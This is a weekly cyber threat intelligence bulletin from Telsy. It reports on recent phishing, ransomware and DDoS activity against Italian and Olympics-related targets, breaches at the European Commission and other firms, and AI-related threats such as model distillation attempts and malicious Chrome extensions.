Latest from Italy, updates in the APT landscape, multiple vulnerabilities exploited ITW

Phishing and ransomware in Italy, notified data breaches, new spyware attacks

 View all
Threat Intelligence, News

New attacks in Italy, reported data breaches, AI and cybersecurity

Weekly Threats hor Telsy

Italy: offensives target the country and the Olympic Games

Over the past week, several attacks targeting Italian entities were tracked. The Municipality of Chioggia and SST Chioggia reported they are managing an ongoing cyberattack that affected SST Chioggia’s digital systems, with possible impacts on certain activities and services managed by the company. A Signal-themed phishing operation was detected, aimed at obtaining potential victims’ personal information by urging them to follow an alleged account verification procedure. In parallel, both INPS-themed phishing and smishing campaigns aimed at stealing personal data were observed, as well as a new activity reported by the Polizia di Stato and the PS Online Police Station that exploits trust among WhatsApp contacts to compromise accounts, which are then used to send further phishing messages to the victim’s contacts. In addition, a new Remcos RAT distribution campaign was observed. Turning to the ransomware landscape, TA505 claimed on its leak site the compromise of Labinf S.p.A.; Qilin Team of Parente Fireworks Group S.r.l.; The Gentlemen of Silvi S.r.l.; and Payouts King of Sofinter S.p.A., although based on the latest analysis the target no longer appears on the adversary’s DLS. In addition, the hacktivist collective BD Anonymous, allegedly of South Asian/Bengali origin, claimed DDoS offensives against the following Italian portals: the Port Authority of Olbia and Golfo Aranci, the Public Connectivity System (SPC), and the Regional Council of the Aosta Valley. Finally, the pro-Russian collective NoName057(16) once again directed its attacks against targets related to the Milano Cortina 2026 Winter Olympic Games. Those targeted include: the Spanish Olympic Committee, the Lithuanian Olympic Committee, the Polish Olympic Committee (also targeted by BD Anonymous), Cortina Parking, and SEA Milan Airports.

 

Data breaches: security incidents impact the European Commission, SmarterTools, and BridgePay Network Solutions

The European Commission confirmed it suffered a cyberattack affecting the central system used to manage staff mobile devices. The incident, detected on 30 January 2026, may have enabled access to personal data of some employees, including names and phone numbers. The Commission stated the incident will be subject to an in-depth analysis and that it will continue to monitor the situation, taking all necessary measures to ensure the security of its systems—showing that even the most protected institutions remain vulnerable when they rely on third-party software. SmarterTools also confirmed that on 29 January 2026 its corporate network was compromised, an incident the company attributes to a group referred to as “Warlock Group”, presumably attributable to the Warlock ransomware operator. The company stated that—being today primarily a Linux company—around 12 Windows servers were involved, while Linux servers were not impacted, and that it immediately shut down servers at both locations and disabled internet access until assessment and system recovery/rebuild were completed. Finally, the U.S. provider of payment gateway and transaction processing services BridgePay Network Solutions confirmed it was hit by a ransomware attack that caused several systems to become unavailable, resulting in a service disruption.

 

AI: increased use of LLMs in attacks

Artificial intelligence is reshaping the cybersecurity landscape in a profoundly ambivalent way. In this regard, Google Threat Intelligence Group published an update on offensive AI use in Q4 2025, highlighting a growing integration of LLMs across the entire attack lifecycle. No direct attacks against frontier models by APT actors were observed; however, attempts at model extraction or “distillation attacks” increased—i.e., legitimate use of APIs to probe models and transfer their capabilities to another model via knowledge distillation (KD), posing an intellectual property theft risk for providers. One case recorded over 100,000 prompts intended to force exposure of Gemini’s reasoning traces; the activity was detected and mitigated in real time. In addition, security researchers tracked a large-scale malicious Chrome extension campaign dubbed AiFrame, which leveraged the growing popularity of AI tools to compromise more than 260,000 users. The analysis identified thirty extensions apparently dedicated to AI assistance, content summarization, and Gmail support which, while presenting themselves as legitimate tools for ChatGPT, Claude, Gemini, and Grok, conceal a sophisticated remotely controlled architecture. The attackers use the “extension spraying” technique to systematically evade takedowns: when an extension is removed, it is immediately republished under a new identifier while keeping the same code, permissions, and infrastructure.

 

Weekly Threats is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.

The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.

Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with valuable information to anticipate attacks and understand their impact, while ensuring a reliable partner in the event of a cyber incident.

Discover more about our Cyber Threat Intelligence solution.